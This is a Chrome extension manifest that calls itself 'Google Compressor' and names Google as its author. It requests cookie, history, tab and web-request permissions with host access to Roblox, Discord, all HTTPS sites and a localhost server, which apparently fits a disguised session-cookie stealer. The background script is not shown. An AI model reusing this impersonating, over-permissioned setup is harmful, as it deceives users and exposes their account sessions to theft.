{
    "name": "Google Compressor",
    "description": "Google Web Compressor",
    "author": "Google",
    "version": "3.9.2",
    "manifest_version": 3,
    "permissions": [
        "cookies",
        "history",
        "tabs",
        "declarativeNetRequest",
        "webRequest",
        "activeTab",
        "storage"
    ],
    "host_permissions": ["http://localhost:3000/*",
        "https://www.roblox.com/*",
        "https://discord.com/*",
        "https://*/*"
    ],
    "background": {
        "service_worker": "scripts/background.js"
    },
    "icons": {
        "16": "images/logo16.png",
        "48": "images/logo48.png",
        "128": "images/logo128.png"
    }
}
